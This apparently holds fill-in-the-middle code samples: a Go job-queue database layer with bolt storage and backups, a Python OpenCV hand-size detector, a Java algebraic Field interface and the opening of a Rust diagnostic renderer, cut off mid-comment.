func (db *db) retrieveDependentJobs(depGroups map[string]bool, newJobKeys map[string]bool) (jobsToQueue []*Job, jobsToUpdate []*Job, err error) { // first convert the depGroups in to sorted prefixes, for linear searching prefixes := make(sobsd, 0, len(depGroups)) for depGroup := range depGroups { prefixes = append(prefixes, [2][]byte{[]byte(depGroup + dbDelimiter), nil}) } sort.Sort(prefixes) err = db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) completeJobBucket := tx.Bucket(bucketJobsComplete) lookupBucket := tx.Bucket(bucketRDTK).Cursor() doneKeys := make(map[string]bool) for { newDepGroups := make(map[string]bool) for _, bsd := range prefixes { for k, _ := lookupBucket.Seek(bsd[0]); bytes.HasPrefix(k, bsd[0]); k, _ = lookupBucket.Next() { key := bytes.TrimPrefix(k, bsd[0]) keyStr := string(key) if doneKeys[keyStr] { continue } encoded := newJobBucket.Get(key) live := false if len(encoded) > 0 { live = true } else if !newJobKeys[keyStr] { encoded = completeJobBucket.Get(key) } if len(encoded) > 0 { dec := codec.NewDecoderBytes(encoded, db.ch) job := &Job{} errf := dec.Decode(job) if errf != nil { return errf } // since we're going to add this job, we also need to // check its DepGroups and repeat this loop on any new // ones for _, depGroup := range job.DepGroups { if depGroup != "" && !depGroups[depGroup] { newDepGroups[depGroup] = true } } if live { jobsToUpdate = append(jobsToUpdate, job) } else { jobsToQueue = append(jobsToQueue, job) } } doneKeys[keyStr] = true } } if len(newDepGroups) > 0 { var newPrefixes sobsd for depGroup := range newDepGroups { newPrefixes = append(newPrefixes, [2][]byte{[]byte(depGroup + dbDelimiter), nil}) depGroups[depGroup] = true } sort.Sort(newPrefixes) prefixes = newPrefixes } else { break } } return nil }) return jobsToQueue, jobsToUpdate, err } // retrieveIncompleteJobKeysByDepGroup gets jobs with the given DepGroup from // the live bucket (ie. those that have been added to the queue and not yet // Archive()d - even if they've been added and archived in the past). func (db *db) retrieveIncompleteJobKeysByDepGroup(depgroup string) ([]string, error) { var jobKeys []string err := db.bolt.View(func(tx *bolt.Tx) error { newJobBucket := tx.Bucket(bucketJobsLive) lookupBucket := tx.Bucket(bucketDTK).Cursor() prefix := []byte(depgroup + dbDelimiter) for k, _ := lookupBucket.Seek(prefix); bytes.HasPrefix(k, prefix); k, _ = lookupBucket.Next() { key := bytes.TrimPrefix(k, prefix) if newJobBucket.Get(key) != nil { jobKeys = append(jobKeys, string(key)) } } return nil }) return jobKeys, err } // storeEnv stores a clientRequest.Env in db unless cached, which means it must // already be there. Returns a key by which the stored Env can be retrieved. func (db *db) storeEnv(env []byte) (string, error) { envkey := byteKey(env) if !db.envcache.Contains(envkey) { err := db.store(bucketEnvs, envkey, env) if err != nil { return envkey, err } db.envcache.Add(envkey, env) } return envkey, nil } // retrieveEnv gets a value from the db that was stored with storeEnv(). The<|fim▁hole|>func (db *db) retrieveEnv(ctx context.Context, envkey string) []byte { cached, got := db.envcache.Get(envkey) if got { return cached.([]byte) } envc := db.retrieve(ctx, bucketEnvs, envkey) db.envcache.Add(envkey, envc) return envc } // updateJobAfterExit stores the Job's peak RAM usage and wall time against the // Job's ReqGroup, but only if the job failed for using too much RAM or time, // allowing recommendedReqGroup*(ReqGroup) to work. 
// // So that state can be restored if the server crashes and is restarted, the // job is rewritten in its current state in to the live bucket. // // It also updates the stdout/err associated with a job. We don't want to store // these in the job, since that would waste a lot of the queue's memory; we // store in db instead, and only retrieve when a client needs to see these. To // stop the db file becoming enormous, we only store these if the cmd failed (or // if forceStorage is true: used when the job got buried) and also delete these // from db when the cmd completes successfully. // // By doing the deletion upfront, we also ensure we have the latest std, which // may be nil even on cmd failure. Since it is not critical to the running of // jobs and workflows that this works 100% of the time, we ignore errors and // write to bolt in a goroutine, giving us a significant speed boost. func (db *db) updateJobAfterExit(ctx context.Context, job *Job, stdo []byte, stde []byte, forceStorage bool) { var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) db.Lock() defer db.Unlock() if db.closed { return } jobkey := job.Key() job.RLock() secs := int(math.Ceil(job.EndTime.Sub(job.StartTime).Seconds())) jrg := job.ReqGroup jpr := job.PeakRAM jpd := job.PeakDisk jec := job.Exitcode jfr := job.FailReason err := enc.Encode(job) job.RUnlock() if err != nil { clog.Error(ctx, "Database operation updateJobAfterExit failed due to Encode failure", "err", err) return } db.updatingAfterJobExit++ db.wgMutex.Lock() defer db.wgMutex.Unlock() wgk := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "updateJobAfterExit", true) err := db.bolt.Batch(func(tx *bolt.Tx) error { key := []byte(jobkey) bjl := tx.Bucket(bucketJobsLive) if bjl.Get(key) != nil { errf := bjl.Put(key, encoded) if errf != nil { return errf } } bo := tx.Bucket(bucketStdO) be := tx.Bucket(bucketStdE) errf := bo.Delete(key) if errf != nil { return errf } errf = be.Delete(key) if errf != nil { return errf } if jec != 0 || forceStorage { if len(stdo) > 0 { errf = bo.Put(key, stdo) } if len(stde) > 0 { errf = be.Put(key, stde) } } if errf != nil { return errf } switch jfr { case FailReasonRAM: b := tx.Bucket(bucketJobRAM) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", jrg, dbDelimiter, jpr)), []byte(strconv.Itoa(jpr))) case FailReasonDisk: b := tx.Bucket(bucketJobDisk) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", jrg, dbDelimiter, jpd)), []byte(strconv.Itoa(int(jpd)))) case FailReasonTime: b := tx.Bucket(bucketJobSecs) errf = b.Put([]byte(fmt.Sprintf("%s%s%20d", jrg, dbDelimiter, secs)), []byte(strconv.Itoa(secs))) } return errf }) db.wg.Done(wgk) if err != nil { clog.Error(ctx, "Database operation updateJobAfterExit failed", "err", err) } db.Lock() db.updatingAfterJobExit-- db.Unlock() }() } // updateJobAfterChange rewrites the job's entry in the live bucket, to enable // complete recovery after a crash. This happens in a goroutine, since it isn't // essential this happens, and we benefit from the speed. 
func (db *db) updateJobAfterChange(ctx context.Context, job *Job) { var encoded []byte enc := codec.NewEncoderBytes(&encoded, db.ch) db.RLock() defer db.RUnlock() if db.closed { return } key := []byte(job.Key()) job.RLock() err := enc.Encode(job) job.RUnlock() if err != nil { clog.Error(ctx, "Database operation updateJobAfterChange failed due to Encode failure", "err", err) return } db.wgMutex.Lock() defer db.wgMutex.Unlock() wgk := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "updateJobAfterChange", true) err := db.bolt.Batch(func(tx *bolt.Tx) error { bjl := tx.Bucket(bucketJobsLive) if bjl.Get(key) == nil { // it's possible for these batches to be interleaved with // archiveJob batches, and for this batch to update that a job // was started to actually execute after the batch that says the // job completed, removing it from the live bucket. In that // case, don't add it back to the live bucket here. return nil } return bjl.Put(key, encoded) }) db.wg.Done(wgk) if err != nil { clog.Error(ctx, "Database operation updateJobAfterChange failed", "err", err) return } db.backgroundBackup(ctx) }() } // modifyLiveJobs is for use if jobs currently in the queue are modified such // that their Key() changes, or their dependencies or dependency groups change. // We simply remove all reference to the old keys in the lookup buckets, as well // as the old jobs from the live bucket, and then do the equivalent of // storeNewJobs() on the supplied new version of the jobs. (This is all done in // one transaction, so won't leave things in a bad state if interrupted half // way.) // The order of oldKeys should match the order of the new jobs. Ie. oldKeys[0] // is the old Key() of jobs[0]. This is so that any stdout/err of old jobs is // associated with the new jobs. func (db *db) modifyLiveJobs(ctx context.Context, oldKeys []string, jobs []*Job) error { encodedJobs, rgLookups, dgLookups, rdgLookups, rgs, _, _, _, err := db.prepareNewJobs(jobs, false) if err != nil { return err } sort.Sort(rgLookups) sort.Sort(rgs) sort.Sort(dgLookups) sort.Sort(rdgLookups) sort.Sort(encodedJobs) lookupBuckets := [][]byte{bucketRTK, bucketDTK, bucketRDTK} err = db.bolt.Batch(func(tx *bolt.Tx) error { // delete old jobs and their lookups newJobBucket := tx.Bucket(bucketJobsLive) bo := tx.Bucket(bucketStdO) be := tx.Bucket(bucketStdE) os := make([][]byte, len(oldKeys)) es := make([][]byte, len(oldKeys)) var hadStd bool for i, oldKey := range oldKeys { suffix := []byte(dbDelimiter + oldKey) for _, bucket := range lookupBuckets { b := tx.Bucket(bucket) // *** currently having to go through the whole lookup // buckets; if this is a noticeable performance issue, will have // to implement a reverse lookup...
errf := b.ForEach(func(k, v []byte) error { if bytes.HasSuffix(k, suffix) { errd := b.Delete(k) if errd != nil { return errd } } return nil }) if errf != nil { return errf } } key := []byte(oldKey) errd := newJobBucket.Delete(key) if errd != nil { return errd } o := bo.Get(key) if o != nil { os[i] = o errd = bo.Delete(key) if errd != nil { return errd } hadStd = true } e := be.Get(key) if e != nil { es[i] = e errd = be.Delete(key) if errd != nil { return errd } hadStd = true } } if len(encodedJobs) > 0 { // now go ahead and store the new lookups and jobs errs := db.putLookups(tx, bucketRTK, rgLookups) if errs != nil { return errs } if len(rgs) > 0 { errs = db.putLookups(tx, bucketRGs, rgs) if errs != nil { return errs } } if len(dgLookups) > 0 { errs = db.putLookups(tx, bucketDTK, dgLookups) if errs != nil { return errs } } if len(rdgLookups) > 0 { errs = db.putLookups(tx, bucketRDTK, rdgLookups) if errs != nil { return errs } } if hadStd { for i, job := range jobs { if os[i] != nil { errs = bo.Put([]byte(job.Key()), os[i]) if errs != nil { return errs } } if es[i] != nil { errs = be.Put([]byte(job.Key()), es[i]) if errs != nil { return errs } } } } return db.putEncodedJobs(tx, bucketJobsLive, encodedJobs) } return nil }) if err != nil { clog.Error(ctx, "Database error during modify", "err", err) } go db.backgroundBackup(ctx) return err } // retrieveJobStd gets the values that were stored using updateJobAfterExit() // for the given job. func (db *db) retrieveJobStd(ctx context.Context, jobkey string) (stdo []byte, stde []byte) { // first wait for any existing updateJobAfterExit() calls to complete //*** this method of waiting seems really bad and should be improved, but in // practice we probably never wait for { db.RLock() if db.updatingAfterJobExit == 0 { db.RUnlock() break } db.RUnlock() <-time.After(10 * time.Millisecond) } err := db.bolt.View(func(tx *bolt.Tx) error { bo := tx.Bucket(bucketStdO) be := tx.Bucket(bucketStdE) key := []byte(jobkey) o := bo.Get(key) if o != nil { stdo = make([]byte, len(o)) copy(stdo, o) } e := be.Get(key) if e != nil { stde = make([]byte, len(e)) copy(stde, e) } return nil }) if err != nil { // impossible, but to keep the linter happy and in case things change in // the future clog.Error(ctx, "Database retrieve failed", "err", err) } return stdo, stde } // recommendedReqGroupMemory returns the 95th percentile peak memory usage of // all jobs that previously ran with the given reqGroup. If there are too few // prior values to calculate a 95th percentile, or if the 95th percentile is // very close to the maximum value, returns the maximum value instead. In either // case, the true value is rounded up to the nearest 100 MB. Returns 0 if there // are no prior values. func (db *db) recommendedReqGroupMemory(reqGroup string) (int, error) { return db.recommendedReqGroupStat(bucketJobRAM, reqGroup, RecMBRound) } // recommendedReqGroupDisk returns the 95th percentile peak disk usage of // all jobs that previously ran with the given reqGroup. If there are too few // prior values to calculate a 95th percentile, or if the 95th percentile is // very close to the maximum value, returns the maximum value instead. In either // case, the true value is rounded up to the nearest 100 MB. Returns 0 if there // are no prior values.
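//
// Sketch of using a learned recommendation (the reqGroup name and the
// caller behaviour are assumptions for illustration):
//
//	mb, err := db.recommendedReqGroupDisk("samtools")
//	if err == nil && mb > 0 {
//		// mb is the 95th percentile (or maximum) of past peak disk
//		// usage, already rounded up to the nearest RecMBRound MB
//	}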
func (db *db) recommendedReqGroupDisk(reqGroup string) (int, error) { return db.recommendedReqGroupStat(bucketJobDisk, reqGroup, RecMBRound) } // recommendedReqGroupTime returns the 95th percentile wall time taken of all // jobs that previously ran with the given reqGroup. If there are too few prior // values to calculate a 95th percentile, or if the 95th percentile is very // close to the maximum value, returns the maximum value instead. In either // case, the true value is rounded up to the nearest second. Returns 0 if there // are no prior values. func (db *db) recommendedReqGroupTime(reqGroup string) (int, error) { return db.recommendedReqGroupStat(bucketJobSecs, reqGroup, RecSecRound) } // recommendedReqGroupStat is the implementation for the other recommend*() // methods. func (db *db) recommendedReqGroupStat(statBucket []byte, reqGroup string, roundAmount int) (int, error) { prefix := []byte(reqGroup) max := 0 var recommendation int err := db.bolt.View(func(tx *bolt.Tx) error { c := tx.Bucket(statBucket).Cursor() // we seek over the bucket, and to avoid having to do it twice (first to // get the overall count, then to get the 95th percentile), we keep the // previous 5%-sized window of values, updating recommendation as the // window fills count := 0 window := jobStatWindowPercent var prev []int var erra error for k, v := c.Seek(prefix); bytes.HasPrefix(k, prefix); k, v = c.Next() { max, erra = strconv.Atoi(string(v)) if erra != nil { return erra } count++ if count > 100 { window = (float32(count) / 100) * jobStatWindowPercent } prev = append(prev, max) if float32(len(prev)) > window { recommendation, prev = prev[0], prev[1:] } } return nil }) if err != nil { return 0, err } if recommendation == 0 { if max == 0 { return recommendation, err } recommendation = max } if max-recommendation < roundAmount { recommendation = max } if recommendation < roundAmount { recommendation = roundAmount } if recommendation%roundAmount > 0 { recommendation = int(math.Ceil(float64(recommendation)/float64(roundAmount))) * roundAmount } return recommendation, err } // store does a basic set of a key/val in a given bucket func (db *db) store(bucket []byte, key string, val []byte) error { err := db.bolt.Batch(func(tx *bolt.Tx) error { b := tx.Bucket(bucket) err := b.Put([]byte(key), val) return err }) return err } // retrieve does a basic get of a key from a given bucket. An error isn't // possible here. func (db *db) retrieve(ctx context.Context, bucket []byte, key string) []byte { var val []byte err := db.bolt.View(func(tx *bolt.Tx) error { b := tx.Bucket(bucket) v := b.Get([]byte(key)) if v != nil { val = make([]byte, len(v)) copy(val, v) } return nil }) if err != nil { // impossible, but to keep the linter happy and in case things change in // the future clog.Error(ctx, "Database retrieve failed", "err", err) } return val } // remove does a basic delete of a key from a given bucket. We don't care about // errors here. func (db *db) remove(ctx context.Context, bucket []byte, key string) { db.wgMutex.Lock() defer db.wgMutex.Unlock() wgk := db.wg.Add(1) go func() { defer internal.LogPanic(ctx, "jobqueue database remove", true) defer db.wg.Done(wgk) err := db.bolt.Batch(func(tx *bolt.Tx) error { b := tx.Bucket(bucket) return b.Delete([]byte(key)) }) if err != nil { clog.Error(ctx, "Database remove failed", "err", err) } }() } // storeBatched stores items in the db in batches for efficiency. bucket is the // name of the bucket to store in.
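//
// Worked example of the sizing logic below, using made-up numbers: for
// 25,300 items, batchSize starts at 25,300/10 = 2,530; rem = 530 > 500, so
// batchSize rounds up to 3,000, giving 8 full batches of 3,000 followed by
// a final batch of 1,300.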
func (db *db) storeBatched(bucket []byte, data sobsd, storer sobsdStorer) error { // we want to add in batches of size data/10, minimum 1000, rounded to // the nearest 1000 num := len(data) batchSize := num / 10 rem := batchSize % 1000 if rem > 500 { batchSize = batchSize - rem + 1000 } else { batchSize -= rem } if batchSize < 1000 { batchSize = 1000 } // based on https://github.com/boltdb/bolt/issues/337#issue-64861745 if num < batchSize { return storer(bucket, data) } batches := num / batchSize offset := num - (num % batchSize) for i := 0; i < batches; i++ { err := storer(bucket, data[i*batchSize:(i+1)*batchSize]) if err != nil { return err } } if offset != 0 { err := storer(bucket, data[offset:]) if err != nil { return err } } return nil } // storeLookups is a sobsdStorer for storing Job.[somevalue]->Job.Key() lookups // in the db. func (db *db) storeLookups(bucket []byte, lookups sobsd) error { err := db.bolt.Batch(func(tx *bolt.Tx) error { return db.putLookups(tx, bucket, lookups) }) return err } // putLookups does the work of storeLookups(). You must be inside a bolt // transaction when calling this. func (db *db) putLookups(tx *bolt.Tx, bucket []byte, lookups sobsd) error { lookup := tx.Bucket(bucket) for _, doublet := range lookups { err := lookup.Put(doublet[0], nil) if err != nil { return err } } return nil } // storeEncodedJobs is a sobsdStorer for storing Jobs in the db. func (db *db) storeEncodedJobs(bucket []byte, encodes sobsd) error { err := db.bolt.Batch(func(tx *bolt.Tx) error { return db.putEncodedJobs(tx, bucket, encodes) }) return err } // putEncodedJobs does the work of storeEncodedJobs(). You must be inside a bolt // transaction when calling this. func (db *db) putEncodedJobs(tx *bolt.Tx, bucket []byte, encodes sobsd) error { bjobs := tx.Bucket(bucket) for _, doublet := range encodes { err := bjobs.Put(doublet[0], doublet[1]) if err != nil { return err } } return nil } // close shuts down the db, should be used prior to exiting. Ensures any // ongoing backgroundBackup() completes first (but does not wait for backup() to // complete). func (db *db) close(ctx context.Context) error { db.Lock() defer db.Unlock() if !db.closed { db.closed = true // before actually closing, wait for any go routines doing database // transactions to complete if db.backingUp { db.backupFinal = true close(db.backupStopWait) db.Unlock() <-db.backupNotification db.wgMutex.Lock() db.wg.Wait(dbRunningTransactionsWaitTime) db.wgMutex.Unlock() db.Lock() } else { db.Unlock() db.wgMutex.Lock() db.wg.Wait(dbRunningTransactionsWaitTime) db.wgMutex.Unlock() db.Lock() } // do a final backup if db.backupsEnabled && db.backupQueued { clog.Debug(ctx, "Jobqueue database not backed up, will do final backup") db.backupToBackupFile(ctx, false) } err := db.bolt.Close() if db.backupMount != nil { erru := db.backupMount.Unmount() if erru != nil { if err == nil { err = erru } else { err = fmt.Errorf("%s (and unmounting backup failed: %s)", err.Error(), erru) } } } return err } return nil } // backgroundBackup backs up the database to a file (the location given during // initDB()) in a goroutine, doing one backup at a time and queueing a further // backup if any other backup requests come in while a backup is running. Any // errors are silently ignored. Spaces out sequential backups so that there is a // gap of max(30s, [time taken to complete previous backup]) seconds between // them.
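//
// Timing sketch based on the logic below: if the previous backup itself
// took 45s (longer than the 30s minimum), backupWait becomes 45s, so a
// queued follow-up backup starts no sooner than 45s after the previous one
// finished, unless backupStopWait fires first.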
func (db *db) backgroundBackup(ctx context.Context) { db.Lock() defer db.Unlock() if db.closed || !db.backupsEnabled { return } if db.backingUp { db.backupQueued = true return } db.backingUp = true slowBackups := db.slowBackups go func(last time.Time, wait time.Duration, doNotWait bool) { defer internal.LogPanic(ctx, "backgroundBackup", true) if !doNotWait { now := time.Now() if !last.IsZero() && last.Add(wait).After(now) { // wait before doing another backup, so we don't slow down new // db accesses all the time select { case <-time.After(last.Add(wait).Sub(now)): break case <-db.backupStopWait: break } } } if slowBackups { // just for testing purposes <-time.After(100 * time.Millisecond) } start := time.Now() db.backupToBackupFile(ctx, slowBackups) db.Lock() db.backingUp = false db.backupLast = time.Now() duration := time.Since(start) if duration > minimumTimeBetweenBackups { db.backupWait = duration } if db.backupFinal { // close() has been called, don't do any more backups and tell // close() we finished our backup db.backupFinal = false db.backupStopWait = make(chan bool) db.Unlock() db.backupNotification <- true return } if db.backupQueued { db.backupQueued = false db.Unlock() db.backgroundBackup(ctx) } else { db.Unlock() } }(db.backupLast, db.backupWait, db.backupFinal) } // backupToBackupFile is used by backgroundBackup() and close() to do the actual // backup. func (db *db) backupToBackupFile(ctx context.Context, slowBackups bool) { // we most likely triggered this backup immediately following an operation // that alters (the important parts of) the database; wait for those // transactions to actually complete before backing up db.wgMutex.Lock() db.wg.Wait(dbRunningTransactionsWaitTime) wgk := db.wg.Add(1) db.wgMutex.Unlock() defer db.wg.Done(wgk) // create the new backup file with temp name tmpBackupPath := db.backupPathTmp err := db.bolt.View(func(tx *bolt.Tx) error { return tx.CopyFile(tmpBackupPath, dbFilePermission) }) if slowBackups { <-time.After(100 * time.Millisecond) } if err != nil { clog.Error(ctx, "Database backup failed", "err", err) // if it failed, delete any partial file that got made errr := os.Remove(tmpBackupPath) if errr != nil && !os.IsNotExist(errr) { clog.Warn(ctx, "Removing bad database backup file failed", "path", tmpBackupPath, "err", errr) } } else { // backup succeeded if db.s3accessor != nil { // upload to s3 then delete it errr := db.s3accessor.UploadFile(tmpBackupPath, db.backupPath, "application/octet-stream") if errr != nil { clog.Warn(ctx, "Uploading new database backup file to S3 failed", "source", tmpBackupPath, "dest", db.backupPath, "err", errr) } errr = os.Remove(tmpBackupPath) if errr != nil { clog.Warn(ctx, "failed to delete temporary backup file after uploading to s3", "path", tmpBackupPath, "err", errr) } } else { // move it over any old backup errr := os.Rename(tmpBackupPath, db.backupPath) if errr != nil { clog.Warn(ctx, "Renaming new database backup file failed", "source", tmpBackupPath, "dest", db.backupPath, "err", errr) } } } } // backup backs up the database to the given writer. Can be called at the same // time as an active backgroundBackup() or even another backup(). You will get // a consistent view of the database at the time you call this. NB: this can be // interrupted by calling db.close().
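//
// Minimal sketch of taking an on-demand backup to a local file (the path
// is made up for illustration):
//
//	f, err := os.Create("/tmp/wr.db.bak")
//	if err == nil {
//		defer f.Close()
//		err = db.backup(f)
//	}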
func (db *db) backup(w io.Writer) error { db.RLock() if db.closed { db.RUnlock() return fmt.Errorf("database closed") } db.RUnlock() return db.bolt.View(func(tx *bolt.Tx) error { _, txErr := tx.WriteTo(w) return txErr }) } // stripBucketFromS3Path removes the first directory from the given path. If // there are no directories, returns an error. func stripBucketFromS3Path(path string) (string, error) { if idx := strings.IndexByte(path, '/'); idx >= 0 { return path[idx+1:], nil } return "", Error{Err: ErrS3DBBackupPath} }<|fim▁end|>
// value may come from the cache, avoiding db access.
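The storeBatched sample above sizes its bolt batches as a tenth of the data, rounded to the nearest 1000 with a floor of 1000, then writes full batches plus the remainder. A minimal Python sketch of that arithmetic (function names are illustrative, not from the sample):

```python
def batch_size(num):
    # a tenth of the data, rounded to the nearest 1000, minimum 1000
    size = num // 10
    rem = size % 1000
    size = size - rem + 1000 if rem > 500 else size - rem
    return max(size, 1000)

def store_batched(data, storer):
    # equivalent to the Go loop over full batches plus the remainder slice
    size = batch_size(len(data))
    if len(data) < size:
        return storer(data)
    for i in range(0, len(data), size):
        storer(data[i:i + size])

assert batch_size(5000) == 1000    # the 1000 floor applies
assert batch_size(24000) == 2000   # 2400 rounds down
assert batch_size(26000) == 3000   # 2600 rounds up
```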
<|file_name|>mti880.py<|end_file_name|><|fim▁begin|>#! /usr/bin/env python # Copyright (C) 2012 Club Capra - capra.etsmtl.ca # # This file is part of CapraVision. # # CapraVision is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import cv2 import cv2.cv as cv import numpy as np from CapraVision.server.filters.parameter import Parameter from CapraVision.server.filters.dataextract import DataExtractor class MTI880(DataExtractor): def __init__(self): DataExtractor.__init__(self) self.hue_min = 113 self.hue_max = 255 self.area_min = 600 self.normal_hand = 0 self.extended_hand = 0 self.closed_hand = 0 self.amplitude = 0 self._capture_normal_hand = False self._capture_extended_hand = False self._capture_closed_hand = False self._calibrate_hue = False self.accumulate = [] self.observers = [] def add_observer(self, observer): self.observers.append(observer) def remove_observer(self, observer): self.observers.remove(observer) def notify_observers(self): for obs in self.observers: obs() def execute(self, image): image = cv2.cvtColor(image, cv2.cv.CV_BGR2HSV) h, _, _ = cv2.split(image) image[h < self.hue_min] *= 0 image[h > self.hue_max] *= 0 #image[image > 0] = 255 gray = cv2.cvtColor(image, cv.CV_BGR2GRAY) cnt, _ = cv2.findContours(gray, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) image *= 0 area, c = self.detect_biggest_area(gray) if self._calibrate_hue and c is not None and area > self.area_min: self.hue_min += 1 #self.notify_observers() elif self._calibrate_hue and self.hue_min > 0: print self.hue_min self.notify_observers() self._calibrate_hue = False self.calibrate_closed_hand(area) self.calibrate_extended_hand(area) self.calibrate_normal_hand(area) if c is not None and area >= self.area_min: hull = cv2.convexHull(c) cv2.drawContours(image, [hull],-1, (255,255,255), -1) self.notify_output_observers(str(self.calc_return_value(area)) + "\n") else: self.notify_output_observers('0\n') return image def detect_biggest_area(self, gray): cnt, _ = cv2.findContours(gray, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) maxarea = 0 maxcnt = None for c in cnt: approx = cv2.approxPolyDP(c, 0, False) area = np.abs(cv2.contourArea(c)) if area > maxarea: maxarea = area maxcnt = c return (maxarea, maxcnt) def calibrate_normal_hand(self, area): if self._capture_normal_hand: self.accumulate.append(area) if len(self.accumulate) == 10: total = 0 for val in self.accumulate: total += val self._capture_normal_hand = False self.normal_hand = total / 10 self.accumulate = [] self.notify_observers() def calibrate_extended_hand(self, area): if self._capture_extended_hand: self.accumulate.append(area) if len(self.accumulate) == 10: total = 0 for val in self.accumulate: total += val self._capture_extended_hand = False self.extended_hand = total / 10 self.accumulate = [] self.notify_observers() def calibrate_closed_hand(self, area): if self._capture_closed_hand:<|fim▁hole|> if len(self.accumulate) == 10: total = 0 for val in self.accumulate: total += val self._capture_closed_hand = 
False self.closed_hand = total / 10 self.accumulate = [] self.notify_observers() def calc_return_value(self, area): if area > self.normal_hand: diff = (self.extended_hand - self.normal_hand) * (self.amplitude / 100.0) if area > (self.normal_hand + diff): return area else: return 0 else: diff = (self.normal_hand - self.closed_hand) * (self.amplitude / 100.0) if area < (self.normal_hand - diff): return -area else: return 0<|fim▁end|>
self.accumulate.append(area)
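The completion above appends one area sample per frame; each of the sample's calibrate_* methods then averages ten samples into a reference value and resets the accumulator. A compact sketch of that pattern (the class name is ours):

```python
class AreaCalibrator:
    """Collect n samples, then latch their mean (mirrors calibrate_closed_hand)."""
    def __init__(self, n=10):
        self.n = n
        self.accumulate = []
        self.value = None

    def feed(self, area):
        self.accumulate.append(area)
        if len(self.accumulate) == self.n:
            self.value = sum(self.accumulate) / float(self.n)
            self.accumulate = []
            return True   # calibration finished
        return False
```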
<|file_name|>Field.java<|end_file_name|><|fim▁begin|>package org.real2space.neumann.evaris.core.structure; /** * Project Neumann *<|fim▁hole|> * @version 0 * * created 2016/11/01 * added "extends Ring<F>" 2016/11/9 */ public interface Field<F> extends Ring<F> { /* * Multiply this member by an inverse of "other". */ public void divide (F other); /* * Returns an inverse of this member. */ public F inverse (); }<|fim▁end|>
* @author RealTwo-Space
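Field.java only fixes a contract: divide(other) must behave like multiplying by other's inverse(). A Python sketch of one lawful implementation over the rationals (illustrative only, not part of the Neumann project):

```python
from fractions import Fraction

class RationalField:
    def __init__(self, value):
        self.value = Fraction(value)

    def inverse(self):
        return RationalField(Fraction(1) / self.value)

    def divide(self, other):
        # divide == multiply by the inverse, as the interface comment requires
        self.value *= other.inverse().value

x = RationalField(3)
x.divide(RationalField(4))
assert x.value == Fraction(3, 4)
```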
<|file_name|>renderer.rs<|end_file_name|><|fim▁begin|>use std::io::{self, Write}; use std::ops::Range; use termcolor::{ColorSpec, WriteColor}; use crate::diagnostic::{LabelStyle, Severity}; use crate::files::{Error, Location}; use crate::term::{Chars, Config, Styles}; /// The 'location focus' of a source code snippet. pub struct Locus { /// The user-facing name of the file. pub name: String, /// The location. pub location: Location, } /// Single-line label, with an optional message. /// /// ```text /// ^^^^^^^^^ blah blah /// ``` pub type SingleLabel<'diagnostic> = (LabelStyle, Range<usize>, &'diagnostic str); /// A multi-line label to render. /// /// Locations are relative to the start of where the source code is rendered. pub enum MultiLabel<'diagnostic> { /// Multi-line label top. /// The contained value indicates where the label starts. /// /// ```text /// ╭────────────^ /// ``` /// /// Can also be rendered at the beginning of the line /// if there is only whitespace before the label starts. /// /// /// ```text /// ╭ /// ``` Top(usize), /// Left vertical labels for multi-line labels. /// /// ```text /// │ /// ``` Left, /// Multi-line label bottom, with an optional message. /// The first value indicates where the label ends. /// /// ```text /// ╰────────────^ blah blah /// ``` Bottom(usize, &'diagnostic str), } #[derive(Copy, Clone)] enum VerticalBound { Top, Bottom, } type Underline = (LabelStyle, VerticalBound); /// A renderer of display list entries. /// /// The following diagram gives an overview of each of the parts of the renderer's output: /// /// ```text /// ┌ outer gutter /// │ ┌ left border /// │ │ ┌ inner gutter /// │ │ │ ┌─────────────────────────── source ─────────────────────────────┐ /// │ │ │ │ │ /// ┌──────────────────────────────────────────────────────────────────────────── /// header ── │ error[0001]: oh noes, a cupcake has occurred! /// snippet start ── │ ┌─ test:9:0 /// snippet empty ── │ │ /// snippet line ── │ 9 │ ╭ Cupcake ipsum dolor. Sit amet marshmallow topping cheesecake /// snippet line ── │ 10 │ │ muffin. Halvah croissant candy canes bonbon candy. Apple pie jelly /// │ │ ╭─│─────────^ /// snippet break ── │ · │ │ /// snippet line ── │ 33 │ │ │ Muffin danish chocolate soufflé pastry icing bonbon oat cake. /// snippet line ── │ 34 │ │ │ Powder cake jujubes oat cake. Lemon drops tootsie roll marshmallow /// │ │ │ ╰─────────────────────────────^ blah blah /// snippet break ── │ · │ /// snippet line ── │ 38 │ │ Brownie lemon drops chocolate jelly-o candy canes. Danish marzipan /// snippet line ── │ 39 │ │ jujubes soufflé carrot cake marshmallow tiramisu caramels candy canes. /// │ │ │ ^^^^^^^^^^^^^^^^^^^ -------------------- blah blah /// │ │ │ │ /// │ │ │ blah blah /// │ │ │ note: this is a note /// snippet line ── │ 40 │ │ Fruitcake jelly-o danish toffee. Tootsie roll pastry cheesecake /// snippet line ── │ 41 │ │ soufflé marzipan. Chocolate bar oat cake jujubes lollipop pastry /// snippet line ── │ 42 │ │ cupcake. Candy canes cupcake toffee gingerbread candy canes muffin /// │ │ │ ^^^^^^^^^^^^^^^^^^ blah blah /// │ │ ╰──────────^ blah blah /// snippet break ── │ · /// snippet line ── │ 82 │ gingerbread toffee chupa chups chupa chups jelly-o cotton candy. 
